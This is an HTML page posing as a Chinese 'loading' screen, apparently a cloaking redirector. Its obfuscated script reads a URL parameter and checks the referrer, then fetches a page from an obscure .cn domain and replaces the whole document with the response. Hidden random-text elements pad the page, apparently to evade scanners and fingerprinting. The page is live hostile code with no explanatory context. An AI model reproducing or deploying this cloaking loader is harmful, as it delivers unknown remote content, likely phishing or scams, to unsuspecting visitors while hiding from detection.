<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .tJ7qZgcRMr {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .tJ7qZgcRMr .HLHNTn6PR {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .tJ7qZgcRMr .content {
            line-height: 50px;
            text-align: center
        }

        .tJ7qZgcRMr .img {
            width: 100%
        }

        .tJ7qZgcRMr .VffWqg3Yi3M {
            text-align: center
        }

        .tJ7qZgcRMr .VffWqg3Yi3M span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .tJ7qZgcRMr .VffWqg3Yi3M span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .tJ7qZgcRMr .VffWqg3Yi3M span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .tJ7qZgcRMr .VffWqg3Yi3M span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .tJ7qZgcRMr .VffWqg3Yi3M span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .tJ7qZgcRMr .VffWqg3Yi3M span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .tJ7qZgcRMr .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function WdXVxP7es7a(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var NAav9Ck = WdXVxP7es7a('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ NAav9Ck +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ NAav9Ck +".html?a=share";
		}
		
        RDRyr7roL=url+"#"+new Date().getTime();
        RDRyr7roL && function() {
            $.get(RDRyr7roL, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>lAfmhySi8dnq3Q3LlHi9ipPEctRZFzy1fk23SPnFv6CLmPwUbcTbw1CynObgXbnGMuoK</p>
<ul style='display:none' >VpxUXTQeG5JvnzpqAQyphngfXANu7LEGFcMT1jsMJcWI1mC4UEpEZxVdTgZ</ul>
<p  style='display:none'>lAfmhySi8dnq3Q3LlHi9ipPEctRZFzy1fk23SPnFv6CLmPwUbcTbw1CynObgXbnGMuoK</p>
<ul style='display:none' >VpxUXTQeG5JvnzpqAQyphngfXANu7LEGFcMT1jsMJcWI1mC4UEpEZxVdTgZ</ul>
<a  href='#' style='display:none'>S3v4oUx2mnqqls9qSQz8X8A0OHw0ZlXqtuEYonlBJPO2QNZFTmSbKtw7F3Nu0qg</a>
<img  src='' style='display:none'>
<b style='display:none' >gA7s0WEFwE0rg0s9FRNbOD7npejxTpsFhS8WcqrczGbof606p2phpUmKj9smxVOSZ8uGpm8vrBxb9ps6f6wSEjslBuT1tRrDlMmNi</b>
<span style='display:none'>bdHu82NevtYcggcsTSIJhYLN6hjrdmpEPmdd8D8kRv4Moqv2vvqLs7QQy4PAR2qGtMC</span>
<li style='display:none' >DlFAq4hqbp3dyPA7tQU2rLfG5mEUENp9jEwWCrl1zTwbWzqncfsufHj05yOAV3QjDQju9SmbpruEuIjFN68SRvvYP54CmWk6v</li>
<div style='display:none'>w6UxQAo1bcNh5a2whwLGCAQOz1l8NuDVX9wr0R</div><div class="tJ7qZgcRMr">
    <div class="HLHNTn6PR">
        <div class="VffWqg3Yi3M">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >V5mQsNoNp98rxf9gklhD4aWwiRyFwMiUKVegSmhThiXtS1kdRz7y335ImzeIz9eiyH8H1LrbfDo2TowpJLSlkRkDDQMaMarcFA</ul>
<p  style='display:none'>dwZsywkB8TOml9IuVOqa5gE3VTZQZ7ZFX0FyvoVvBSKaTjWew6BTP</p>
<ul style='display:none' >V5mQsNoNp98rxf9gklhD4aWwiRyFwMiUKVegSmhThiXtS1kdRz7y335ImzeIz9eiyH8H1LrbfDo2TowpJLSlkRkDDQMaMarcFA</ul>
<li style='display:none' >wdQkcJfT3qNHw8ZIqRh5</li></body>
</html>